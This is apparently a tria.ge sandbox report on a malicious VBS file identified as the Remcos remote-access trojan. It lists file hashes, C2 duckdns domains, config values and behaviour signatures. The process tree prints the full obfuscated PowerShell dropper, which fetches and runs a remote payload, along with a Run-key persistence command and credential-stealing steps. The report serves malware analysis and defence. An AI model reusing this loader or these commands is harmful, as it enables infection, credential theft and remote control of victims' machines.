Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

1d90d341b6...b8.vbs

windows7-x64

10

1d90d341b6...b8.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/11/2024, 02:16

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    1d90d341b6aac839d683afe80e3ec87b73564abcdbb205fee5ba795f34af5db8.vbs

  • Size

    29KB

  • MD5

    2bd1468a7b92abec901b765e0096bb54

  • SHA1

    e82a0cf23beaf7b9082713f8c35bfbbac5aa9578

  • SHA256

    1d90d341b6aac839d683afe80e3ec87b73564abcdbb205fee5ba795f34af5db8

  • SHA512

    2a69b75c1d978394b8aa50e68359c7df7b5f65c0df410e2051bb71f4e7ae5d630d9d243e700cf11a156aef508613e15086a973f2cf218da653de80f2c0de0847

  • SSDEEP

    192:CBH/B1eRFrh86O1oFnZS1VvttRSPQUmKGTT3I8eEnUxMPzduNZQ7ilOHVMp4Vm5D:+a7VQ9jTbX3RM5wiz9g93U4j4bw4TZ02

Score
10/10
remcosa$iancollectiondiscoverypersistencerat

Malware Config

Extracted

Family

remcos

Botnet

A$ian

C2

iwarsut775laudryed1.duckdns.org:57484

iwarsut775laudryed1.duckdns.org:57483

iwarsut775laudryed2.duckdns.org:57484

iwarsut775laudryed3.duckdns.org:57484
Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    hmbnspt.dat

  • keylog_flag

    false

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    shibuetgtst-CR733Q

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 7 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
    collection
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1d90d341b6aac839d683afe80e3ec87b73564abcdbb205fee5ba795f34af5db8.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2836
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$attributlinien='Ugudeligste118';;$Manfred0='Skumleris';;$Bondage='Terraces';;$Brachycera='katakinetomeric';;$Tvangsfjernelses='Miskicks';;$Shieldlessness=$host.Name;function Smokingjakkernes($Bhutaneren){If ($Shieldlessness) {$Forfgtelse=5} for ($Folen189=$Forfgtelse;;$Folen189+=6){if(!$Bhutaneren[$Folen189]) { break }$Datamngde+=$Bhutaneren[$Folen189]}$Datamngde}function Treddle($Gnawings248){ .($trannens) ($Gnawings248)}$Klimaer=Smokingjakkernes 'UndaznfebruEBaguetHelmh.CambiWCivilEVlgerbFo,teCDomssL evalimidteEMagi N MonoT';$Orante=Smokingjakkernes 'Pl.tyMAtmomoT,komz ,megiTrifolUnevalFn sla T pc/';$afparerer=Smokingjakkernes 'RaughT P,oblBaronsAfkna1 Styr2';$Sheathlike=' skri[Pan oNGu,loe SamtTFerma. terrSSyninESubh.rHalvnvKarteiKnudecDamseEstemmPobtruOmimesiUnreanSkatttSupermChezsaMoro.nsengeABeramg HaraEErfarRParke]Bedro: Floc: Hu ds .soaeChondCNervsUDy.eprSem tITheont BairYHillepzonkeRBefj,o Sup t FreeoSk ivc BalaoUnsorLStala=Unpai$ t lsa Bi,rF H,pppOphveAprodurTransEHjem,r,iskeEbraatr';$Orante+=Smokingjakkernes 'Haemu5ordsg.Anden0 Emen Sulta(Pre rW Uk,ii NontnRetsodForkooNaboew Hrecs,erde TangeNCous.TForv Ho o1Elkas0Aorta.Sav a0Em ro;.ntra B.llW DrifiThom n nowl6 Jing4Ete n;,gern kuffxTutun6Slug,4Sonar;decou ,abelrCha,kvGudbr:Komma1Bums.3Stig 1Whit .,olyp0Lutin)Apant S queGContueSkolecTo nykBistao Koke/Gcell2 unne0Opvis1Punga0 Ca n0Va.me1Ledet0 teri1Snyde VejtrFAggraiA visrPr ceeUnguefIn rgo MoslxJetpi/S,oun1Nappe3Skraa1Rigse.Calam0';$Hariolation=Smokingjakkernes 'Ch liuGlickSDisagEPsychr teer-Bouboa.atergUdskreS,iddnOlfe T';$sodapastillernes=Smokingjakkernes 'Sjkleh UndetJalapt.erivpSve isSekti:ation/lysin/detergVen la Rendr Prish booko TrimuEpuradSlyngjkon.moBlse,uNusserMiliemGenn .Traf.c Ha,noBa anmT ipl/Da.spm ByzoaTveden ururn Tilsir.klatti,baoKar,olSkud .Sk ftiAdsc.n inglf';$Solsejlet=Smokingjakkernes 'Eks.g>';$trannens=Smokingjakkernes 'KafirIOverseForm.X';$Cer='Eskadreronings';$Lament='\Geografens.Mis';Treddle (Smokingjakkernes ' Pseu$ cadeGGirlelWaldeo iconbSlo pa Bewil Ungd: Kem sGaz akLectuyIriagGBen.ag OrthEAmputMUbicaORef.eRPretoeImageL Lngd= dmar$ immEGeniunLogomvSmoor: StorA Mosep verpAp,iod odnoApolitTGiddyA rbej+ fort$ParallTypegARe mamA.moneIndlrn Catat');Treddle (Smokingjakkernes 'Snitf$Burgog Pin LStigeOAlexaBR,ppoa FoghlOp.pa:BordcpBin slPerseAK lons Het TmorphRDigebeReconn Edi.dOscineInnocsbrist= Imbl$Prgnis Theto,urvadKulegaUansvpurha Aau.ocS Bibltn ntrI UltrlHowdiLRecome RkkeR.orosnFlytteA ophSCap i.Ben osMoi apSalg.LAnalyiBok eT Psy,(Subun$Fist S ncloLeverlTiggesLat,he .camJF.ernLJ uncEtheriT Af,o)');Treddle (Smokingjakkernes $Sheathlike);$sodapastillernes=$Plastrendes[0];$Morphophonemics=(Smokingjakkernes 'Killi$SkglaGProj LCacodo S.rib Fi kAOphthlP nar: pstaR rngeukardasGaldtTRaadhKRejsea oentMOverbROpkloEDiver=jenf,NTry.nEVelcrw Mula-UdladOSneezb.prrej FetieUnallc ReintPa af OverSForfiytortuSPavilt gnbeRegn,MDiscu.inter$DeconKMelodLOversiTrummMT lkmACl.arEKolesr');Treddle ($Morphophonemics);Treddle (Smokingjakkernes ' Post$Oly pr rndeuEllets ilitt Sag kSvmmeaUnimpmKlikkrSinkce yth.BibliH.jedoe BirtaSurged andeK nderGotissLaryn[ Meta$ Stj H rynaMenulrpacifiAf kro B drlAsminaaa.detGeneri Plano un.rnBrass] Wo k=Penin$OccipOEntenr Naboa NgnenMusiktR,mune');$delustering=Smokingjakkernes ' Ener$ R,ndrFiniouTroldsBa kbtNonbokSammea Su,emBrun rUdebaeBerta. ,edtD CogioLi,htw Co.snUdtaglRatifoFlle aSemotdMortiFParali .kamlEncroe Tops( airn$ Ugess.astnoTvr.kd eknia ndicp DispaJokessNonuptPinchiDulselStvn.l FraneArrivrsnurrnEthyleVi iasHarne,Su,er$o iedAS rinlHa utiBrepom Skabe BlusnTrykstArbalaWent tinteli Sbreo.askin,ftaseberegrMinianTe nee Sluts Unpr)';$Alimentationernes=$Skyggemorel;Treddle (Smokingjakkernes 'befit$SkalkgHaandlMiscoobe ribSpri.aUdbrul Occl: SubgtMirjaaDeocupje doNTimbeI Mod nFyrvrgGrandESkrivRfastan LageEBrshaSSemi.=Inv.s(aort t Wa geVirusS.ylieTEarth-TilripHomo,aAntreTMedich Tran A kla$Dame AGaalgLB skvIPart m PolieUnaccNdagletNummeaBardetTaa,eiBrugeOAvancn la ie,aroeRJulebN.aasyeFunkts Yn.e)');while (!$tapningernes) {Treddle (Smokingjakkernes 'Grovv$FinmegLyksal reveoPerisb FireaGrumsl Palu:Die,eDReprei PinanS.eeduIndtgsUfo e=Gener$InterG C fio GesewKapitl') ;Treddle $delustering;Treddle (Smokingjakkernes 'CitroSRugosTDiverARets RModeot Pann-Af tusOxydel agerERentvESpankpTro p Spiro4');Treddle (Smokingjakkernes 'Inter$Sabbagspndil Cemeo Sam bKulkaASo delSortk: Ogh tFooteaHulkoPComplN T eniPartinSteveg CoveeSkydeR ydronRedoxeEpigoS Fart=Unesc(T,esaTScoptEGrfteSCipput onog- UnskpEmbryA MissTP,oviHSipho H,per$SkammA Apotl TreaiBioasMPantaeUnreonVit.cTGeronA MasutLayabIAlkovOR.guan Thi E olaRGalvaNInvilEFleawSOv ri)') ;Treddle (Smokingjakkernes 'Dansk$ Fo egBite LPincuOSk beBIrereaStrabLU,att: RestkDevieo TingnReri kGodelUS rumrConvorTesseeSmiderSelefeFinmas Sco.=Gentl$FelttG fteLUtilgo halvBBartlAUnchaLArres:CakebkCamelLanlgsiRebatpHeartP PregEUd.ajsHal lKStrikRDeteknLindoT D,meESirliRTaktfn A snEPerso3Spili7Lands+ Sub.+ phys%Refer$IditoPret.eLelemeaT kroS HandtQuadrRKl rkeInte nTilstdOrthoEAuspisBand .AffilCSolutO RatiuMetreNReitet') ;$sodapastillernes=$Plastrendes[$Konkurreres]}$Mouldier=290646;$Nickolajs=32703;Treddle (Smokingjakkernes 'Seg l$ beviGSuperlVanddoLysa bForviAFamislEmuls:P opeH OpslE Am nbJinksRM ddiE DikeWT,ntidP eusOBarnemRecad Oc po=Hjade ProviGpe iaeKderytskede- MickcProceO Vo yN evigTUnculEBen inAimfutF emh kul,u$ KorrAS perLChianIStudeMSmaabE Psyknkik.eTAffatAForbrt,tereIBenigo,dresNbevidE esboRYamskNS.ocheunderS');Treddle (Smokingjakkernes 'Aaben$BortfgRem.sl Om,tosygefbproa.aspejll Bjrn:noninF jemlaCarricBandao CayenSq.irsAfsentTrimee HernnBogyssNdsfa N nt=Sysop Fler[L koeSNon,ey IllusLe,ettCoveneC eckmK efa. oxteCUkraio RicknHvervvArg.meNyderrAnti tOrie ] Omko:Sq am: rspaFTreddrguldgoPhytomDirigBTerria ybstsDraabeForbu6Nurse4BlselSLicentAlmg rAcro iBjrnenSpe mgElli,(Titre$BndslHTheekedron.bCu tnrZygi.e S luwModerdOpruso.ociamOverb)');Treddle (Smokingjakkernes 'Resis$RustbGSe.vpLPigebO ProdBTriamaAurael Cyli:Ever SCivilhSpartASemeidBr geePukleTS,igmaO.stniTaverlMouly Blgek=Unfav Dyble[SkaftSHnderyPun tsFremmtBrevoEBombeMMesos.Reco,tLnm dEUnneixac eltPuerp.Bes,jEArmbrnDivotCbasilOReappdTubboIdiannNprivaGUvuli]progr: To g:AnbriaEm,lssInconcSmileiGangtIAdfrd.RepatgstillE LitutFidiaSP ssiTH emaRHuge itilbjnRejseGS yts(Spejl$ ,pdaFLingea Gun CMult OTubbiNOmgivSBlan.tEsta EDisconMadonS D mo)');Treddle (Smokingjakkernes 'Boner$ boliGInc uLDepreo KakiBFalanAHenfalS,pra: SlipUSphyrN poplDUntapeHsltfRAutomfUndanIShan.lPreprLTilba=Hadic$SkattsEjsakhCa paAElec.DSauroe.vereTEelboAI coriGtranlDeerh.Slhu SNonseu EntebProgrSlill,TDunlirH rebIMilj N TorsG F,rb( Base$ Mo.iM ForsONo,diu aa.eLEndeldInoffiUnpuceStillrCardi,Morta$arbejNTradiISyntec TrudK iolioFredsL FaelaExegeJRepr s Fanf)');Treddle $Underfill;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3416
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$attributlinien='Ugudeligste118';;$Manfred0='Skumleris';;$Bondage='Terraces';;$Brachycera='katakinetomeric';;$Tvangsfjernelses='Miskicks';;$Shieldlessness=$host.Name;function Smokingjakkernes($Bhutaneren){If ($Shieldlessness) {$Forfgtelse=5} for ($Folen189=$Forfgtelse;;$Folen189+=6){if(!$Bhutaneren[$Folen189]) { break }$Datamngde+=$Bhutaneren[$Folen189]}$Datamngde}function Treddle($Gnawings248){ .($trannens) ($Gnawings248)}$Klimaer=Smokingjakkernes 'UndaznfebruEBaguetHelmh.CambiWCivilEVlgerbFo,teCDomssL evalimidteEMagi N MonoT';$Orante=Smokingjakkernes 'Pl.tyMAtmomoT,komz ,megiTrifolUnevalFn sla T pc/';$afparerer=Smokingjakkernes 'RaughT P,oblBaronsAfkna1 Styr2';$Sheathlike=' skri[Pan oNGu,loe SamtTFerma. terrSSyninESubh.rHalvnvKarteiKnudecDamseEstemmPobtruOmimesiUnreanSkatttSupermChezsaMoro.nsengeABeramg HaraEErfarRParke]Bedro: Floc: Hu ds .soaeChondCNervsUDy.eprSem tITheont BairYHillepzonkeRBefj,o Sup t FreeoSk ivc BalaoUnsorLStala=Unpai$ t lsa Bi,rF H,pppOphveAprodurTransEHjem,r,iskeEbraatr';$Orante+=Smokingjakkernes 'Haemu5ordsg.Anden0 Emen Sulta(Pre rW Uk,ii NontnRetsodForkooNaboew Hrecs,erde TangeNCous.TForv Ho o1Elkas0Aorta.Sav a0Em ro;.ntra B.llW DrifiThom n nowl6 Jing4Ete n;,gern kuffxTutun6Slug,4Sonar;decou ,abelrCha,kvGudbr:Komma1Bums.3Stig 1Whit .,olyp0Lutin)Apant S queGContueSkolecTo nykBistao Koke/Gcell2 unne0Opvis1Punga0 Ca n0Va.me1Ledet0 teri1Snyde VejtrFAggraiA visrPr ceeUnguefIn rgo MoslxJetpi/S,oun1Nappe3Skraa1Rigse.Calam0';$Hariolation=Smokingjakkernes 'Ch liuGlickSDisagEPsychr teer-Bouboa.atergUdskreS,iddnOlfe T';$sodapastillernes=Smokingjakkernes 'Sjkleh UndetJalapt.erivpSve isSekti:ation/lysin/detergVen la Rendr Prish booko TrimuEpuradSlyngjkon.moBlse,uNusserMiliemGenn .Traf.c Ha,noBa anmT ipl/Da.spm ByzoaTveden ururn Tilsir.klatti,baoKar,olSkud .Sk ftiAdsc.n inglf';$Solsejlet=Smokingjakkernes 'Eks.g>';$trannens=Smokingjakkernes 'KafirIOverseForm.X';$Cer='Eskadreronings';$Lament='\Geografens.Mis';Treddle (Smokingjakkernes ' Pseu$ cadeGGirlelWaldeo iconbSlo pa Bewil Ungd: Kem sGaz akLectuyIriagGBen.ag OrthEAmputMUbicaORef.eRPretoeImageL Lngd= dmar$ immEGeniunLogomvSmoor: StorA Mosep verpAp,iod odnoApolitTGiddyA rbej+ fort$ParallTypegARe mamA.moneIndlrn Catat');Treddle (Smokingjakkernes 'Snitf$Burgog Pin LStigeOAlexaBR,ppoa FoghlOp.pa:BordcpBin slPerseAK lons Het TmorphRDigebeReconn Edi.dOscineInnocsbrist= Imbl$Prgnis Theto,urvadKulegaUansvpurha Aau.ocS Bibltn ntrI UltrlHowdiLRecome RkkeR.orosnFlytteA ophSCap i.Ben osMoi apSalg.LAnalyiBok eT Psy,(Subun$Fist S ncloLeverlTiggesLat,he .camJF.ernLJ uncEtheriT Af,o)');Treddle (Smokingjakkernes $Sheathlike);$sodapastillernes=$Plastrendes[0];$Morphophonemics=(Smokingjakkernes 'Killi$SkglaGProj LCacodo S.rib Fi kAOphthlP nar: pstaR rngeukardasGaldtTRaadhKRejsea oentMOverbROpkloEDiver=jenf,NTry.nEVelcrw Mula-UdladOSneezb.prrej FetieUnallc ReintPa af OverSForfiytortuSPavilt gnbeRegn,MDiscu.inter$DeconKMelodLOversiTrummMT lkmACl.arEKolesr');Treddle ($Morphophonemics);Treddle (Smokingjakkernes ' Post$Oly pr rndeuEllets ilitt Sag kSvmmeaUnimpmKlikkrSinkce yth.BibliH.jedoe BirtaSurged andeK nderGotissLaryn[ Meta$ Stj H rynaMenulrpacifiAf kro B drlAsminaaa.detGeneri Plano un.rnBrass] Wo k=Penin$OccipOEntenr Naboa NgnenMusiktR,mune');$delustering=Smokingjakkernes ' Ener$ R,ndrFiniouTroldsBa kbtNonbokSammea Su,emBrun rUdebaeBerta. ,edtD CogioLi,htw Co.snUdtaglRatifoFlle aSemotdMortiFParali .kamlEncroe Tops( airn$ Ugess.astnoTvr.kd eknia ndicp DispaJokessNonuptPinchiDulselStvn.l FraneArrivrsnurrnEthyleVi iasHarne,Su,er$o iedAS rinlHa utiBrepom Skabe BlusnTrykstArbalaWent tinteli Sbreo.askin,ftaseberegrMinianTe nee Sluts Unpr)';$Alimentationernes=$Skyggemorel;Treddle (Smokingjakkernes 'befit$SkalkgHaandlMiscoobe ribSpri.aUdbrul Occl: SubgtMirjaaDeocupje doNTimbeI Mod nFyrvrgGrandESkrivRfastan LageEBrshaSSemi.=Inv.s(aort t Wa geVirusS.ylieTEarth-TilripHomo,aAntreTMedich Tran A kla$Dame AGaalgLB skvIPart m PolieUnaccNdagletNummeaBardetTaa,eiBrugeOAvancn la ie,aroeRJulebN.aasyeFunkts Yn.e)');while (!$tapningernes) {Treddle (Smokingjakkernes 'Grovv$FinmegLyksal reveoPerisb FireaGrumsl Palu:Die,eDReprei PinanS.eeduIndtgsUfo e=Gener$InterG C fio GesewKapitl') ;Treddle $delustering;Treddle (Smokingjakkernes 'CitroSRugosTDiverARets RModeot Pann-Af tusOxydel agerERentvESpankpTro p Spiro4');Treddle (Smokingjakkernes 'Inter$Sabbagspndil Cemeo Sam bKulkaASo delSortk: Ogh tFooteaHulkoPComplN T eniPartinSteveg CoveeSkydeR ydronRedoxeEpigoS Fart=Unesc(T,esaTScoptEGrfteSCipput onog- UnskpEmbryA MissTP,oviHSipho H,per$SkammA Apotl TreaiBioasMPantaeUnreonVit.cTGeronA MasutLayabIAlkovOR.guan Thi E olaRGalvaNInvilEFleawSOv ri)') ;Treddle (Smokingjakkernes 'Dansk$ Fo egBite LPincuOSk beBIrereaStrabLU,att: RestkDevieo TingnReri kGodelUS rumrConvorTesseeSmiderSelefeFinmas Sco.=Gentl$FelttG fteLUtilgo halvBBartlAUnchaLArres:CakebkCamelLanlgsiRebatpHeartP PregEUd.ajsHal lKStrikRDeteknLindoT D,meESirliRTaktfn A snEPerso3Spili7Lands+ Sub.+ phys%Refer$IditoPret.eLelemeaT kroS HandtQuadrRKl rkeInte nTilstdOrthoEAuspisBand .AffilCSolutO RatiuMetreNReitet') ;$sodapastillernes=$Plastrendes[$Konkurreres]}$Mouldier=290646;$Nickolajs=32703;Treddle (Smokingjakkernes 'Seg l$ beviGSuperlVanddoLysa bForviAFamislEmuls:P opeH OpslE Am nbJinksRM ddiE DikeWT,ntidP eusOBarnemRecad Oc po=Hjade ProviGpe iaeKderytskede- MickcProceO Vo yN evigTUnculEBen inAimfutF emh kul,u$ KorrAS perLChianIStudeMSmaabE Psyknkik.eTAffatAForbrt,tereIBenigo,dresNbevidE esboRYamskNS.ocheunderS');Treddle (Smokingjakkernes 'Aaben$BortfgRem.sl Om,tosygefbproa.aspejll Bjrn:noninF jemlaCarricBandao CayenSq.irsAfsentTrimee HernnBogyssNdsfa N nt=Sysop Fler[L koeSNon,ey IllusLe,ettCoveneC eckmK efa. oxteCUkraio RicknHvervvArg.meNyderrAnti tOrie ] Omko:Sq am: rspaFTreddrguldgoPhytomDirigBTerria ybstsDraabeForbu6Nurse4BlselSLicentAlmg rAcro iBjrnenSpe mgElli,(Titre$BndslHTheekedron.bCu tnrZygi.e S luwModerdOpruso.ociamOverb)');Treddle (Smokingjakkernes 'Resis$RustbGSe.vpLPigebO ProdBTriamaAurael Cyli:Ever SCivilhSpartASemeidBr geePukleTS,igmaO.stniTaverlMouly Blgek=Unfav Dyble[SkaftSHnderyPun tsFremmtBrevoEBombeMMesos.Reco,tLnm dEUnneixac eltPuerp.Bes,jEArmbrnDivotCbasilOReappdTubboIdiannNprivaGUvuli]progr: To g:AnbriaEm,lssInconcSmileiGangtIAdfrd.RepatgstillE LitutFidiaSP ssiTH emaRHuge itilbjnRejseGS yts(Spejl$ ,pdaFLingea Gun CMult OTubbiNOmgivSBlan.tEsta EDisconMadonS D mo)');Treddle (Smokingjakkernes 'Boner$ boliGInc uLDepreo KakiBFalanAHenfalS,pra: SlipUSphyrN poplDUntapeHsltfRAutomfUndanIShan.lPreprLTilba=Hadic$SkattsEjsakhCa paAElec.DSauroe.vereTEelboAI coriGtranlDeerh.Slhu SNonseu EntebProgrSlill,TDunlirH rebIMilj N TorsG F,rb( Base$ Mo.iM ForsONo,diu aa.eLEndeldInoffiUnpuceStillrCardi,Morta$arbejNTradiISyntec TrudK iolioFredsL FaelaExegeJRepr s Fanf)');Treddle $Underfill;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3412
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:5092
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Beregningsudtryks" /t REG_EXPAND_SZ /d "%Fdselsattester223% -windowstyle 1 $Delkrederekontoen=(gp -Path 'HKCU:\Software\Poliomyelitises\').Affettuosos;%Fdselsattester223% ($Delkrederekontoen)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:5080
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Beregningsudtryks" /t REG_EXPAND_SZ /d "%Fdselsattester223% -windowstyle 1 $Delkrederekontoen=(gp -Path 'HKCU:\Software\Poliomyelitises\').Affettuosos;%Fdselsattester223% ($Delkrederekontoen)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:3736
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\nyajdpr"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:3932
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ysgcwabzde"
        3⤵
          PID:4336
        • C:\Windows\SysWOW64\msiexec.exe
          C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ysgcwabzde"
          3⤵
          • Accesses Microsoft Outlook accounts
          • System Location Discovery: System Language Discovery
          PID:4384
        • C:\Windows\SysWOW64\msiexec.exe
          C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\auluxsmsrmdlfi"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1536

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      d4ff23c124ae23955d34ae2a7306099a

      SHA1

      b814e3331a09a27acfcd114d0c8fcb07957940a3

      SHA256

      1de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87

      SHA512

      f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x50vvlnh.yzc.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\nyajdpr
      Filesize

      4KB

      MD5

      17eece3240d08aa4811cf1007cfe2585

      SHA1

      6c10329f61455d1c96e041b6f89ee6260af3bd0f

      SHA256

      7cc0db44c7b23e4894fe11f0d8d84b2a82ad667eb1e3504192f3ba729f9a7903

      SHA512

      a7de8d6322410ec89f76c70a7159645e8913774f38b84aafeeeb9f90dc3b9aa74a0a280d0bb6674790c04a8ff2d059327f02ebfda6c4486778d53b7fc6da6370

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Geografens.Mis
      Filesize

      421KB

      MD5

      213e02988b4d838fdbf175c96f49eefb

      SHA1

      29190ed3fd5aa65328b312cfa952a95c752297b0

      SHA256

      1d198b573d3f3715ab7066d7d42eb11c0f69c542d055f6f73abc5cc4d7b82429

      SHA512

      b815a41b58ff9d204f53d2ee8fca3327f916b0b0d65c154a59a0b46026ad6a3784b074cc361be3535e3b421ef8e4b2cf4b222050f9f1b3a15481f1d2fe6bb55a

      Download Submit

    • memory/1536-67-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

      Download

    • memory/1536-72-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

      Download

    • memory/1536-71-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

      Download

    • memory/3412-25-0x0000000005810000-0x0000000005832000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3412-47-0x0000000009120000-0x000000000D315000-memory.dmp

      Filesize

      66.0MB

      Download

    • memory/3412-24-0x0000000005900000-0x0000000005F28000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/3412-26-0x0000000005FE0000-0x0000000006046000-memory.dmp

      Filesize

      408KB

      Download

    • memory/3412-27-0x0000000006050000-0x00000000060B6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/3412-37-0x00000000060C0000-0x0000000006414000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/3412-23-0x0000000002DA0000-0x0000000002DD6000-memory.dmp

      Filesize

      216KB

      Download

    • memory/3412-39-0x00000000066D0000-0x00000000066EE000-memory.dmp

      Filesize

      120KB

      Download

    • memory/3412-40-0x0000000006700000-0x000000000674C000-memory.dmp

      Filesize

      304KB

      Download

    • memory/3412-41-0x0000000007F40000-0x00000000085BA000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/3412-42-0x0000000006C60000-0x0000000006C7A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/3412-43-0x0000000007980000-0x0000000007A16000-memory.dmp

      Filesize

      600KB

      Download

    • memory/3412-44-0x00000000078E0000-0x0000000007902000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3412-45-0x0000000008B70000-0x0000000009114000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/3416-16-0x00007FFAF29E0000-0x00007FFAF34A1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3416-4-0x00007FFAF29E3000-0x00007FFAF29E5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/3416-11-0x0000020BF4FC0000-0x0000020BF4FE2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3416-22-0x00007FFAF29E0000-0x00007FFAF34A1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3416-15-0x00007FFAF29E0000-0x00007FFAF34A1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3416-19-0x00007FFAF29E0000-0x00007FFAF34A1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3932-60-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

      Download

    • memory/3932-65-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

      Download

    • memory/3932-62-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

      Download

